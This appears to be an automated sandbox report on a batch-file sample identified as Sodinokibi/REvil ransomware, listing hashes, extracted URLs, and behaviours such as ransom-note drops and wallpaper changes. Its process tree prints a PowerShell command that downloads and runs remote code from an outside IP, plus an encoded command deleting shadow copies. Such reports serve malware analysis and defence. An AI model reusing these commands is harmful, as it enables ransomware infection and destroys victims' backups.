Analysis
-
max time kernel
39s -
max time network
35s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
15-05-2020 19:19
Static task
static1
Behavioral task
behavioral1
Sample
c509aa5a7dfc8054aa7b969c9b18e245.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
c509aa5a7dfc8054aa7b969c9b18e245.bat
Resource
win10v200430
General
-
Target
c509aa5a7dfc8054aa7b969c9b18e245.bat
-
Size
221B
-
MD5
2f633c8f1954a6a34a856ca408955cc0
-
SHA1
fcad0d04ed8366491a60c78bb0210502e2755f91
-
SHA256
a1eabb8f6bb968611704695eecb919d4b989b4882ddc982fea9d14b1a2d43486
-
SHA512
1f5b2b75571fbbd329bf0c89c8d1789424aaddd8b942fdf7579a36fde344b881093022de34570cb3938b038e394ff2c42854cd6f20d493a896105f22b30f009c
Malware Config
Extracted
http://185.103.242.78/pastes/c509aa5a7dfc8054aa7b969c9b18e245
Extracted
C:\p7wl3-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E87379AD627A29CF
http://decryptor.cc/E87379AD627A29CF
Signatures
-
Drops file in Program Files directory 19 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\RedoClose.midi powershell.exe File opened for modification \??\c:\program files\SuspendCompress.shtml powershell.exe File opened for modification \??\c:\program files\UndoOpen.png powershell.exe File opened for modification \??\c:\program files\UseUndo.tiff powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\p7wl3-readme.txt powershell.exe File opened for modification \??\c:\program files\ConnectResolve.cr2 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\p7wl3-readme.txt powershell.exe File opened for modification \??\c:\program files\RemoveRename.htm powershell.exe File opened for modification \??\c:\program files\StartLock.M2TS powershell.exe File opened for modification \??\c:\program files\ResolveRestart.js powershell.exe File opened for modification \??\c:\program files\RevokeSuspend.tmp powershell.exe File opened for modification \??\c:\program files\UnblockInvoke.mht powershell.exe File opened for modification \??\c:\program files\ConvertRename.wma powershell.exe File opened for modification \??\c:\program files\DismountConvertFrom.xht powershell.exe File opened for modification \??\c:\program files\BlockBackup.vstm powershell.exe File opened for modification \??\c:\program files\ProtectExit.cfg powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\p7wl3-readme.txt powershell.exe File created \??\c:\program files\p7wl3-readme.txt powershell.exe File created \??\c:\program files (x86)\p7wl3-readme.txt powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 304 powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 304 powershell.exe 304 powershell.exe 304 powershell.exe 1036 powershell.exe 1036 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe 304 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 304 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\125rr.bmp" powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1440 wrote to memory of 304 1440 cmd.exe powershell.exe PID 304 wrote to memory of 1036 304 powershell.exe powershell.exe PID 304 wrote to memory of 1036 304 powershell.exe powershell.exe PID 304 wrote to memory of 1036 304 powershell.exe powershell.exe PID 304 wrote to memory of 1036 304 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 304 powershell.exe Token: SeDebugPrivilege 304 powershell.exe Token: SeDebugPrivilege 1036 powershell.exe Token: SeBackupPrivilege 1844 vssvc.exe Token: SeRestorePrivilege 1844 vssvc.exe Token: SeAuditPrivilege 1844 vssvc.exe Token: SeTakeOwnershipPrivilege 304 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\c509aa5a7dfc8054aa7b969c9b18e245.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c509aa5a7dfc8054aa7b969c9b18e245');Invoke-ACEEGDUJNDIFWO;Start-Sleep -s 10000"2⤵
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1844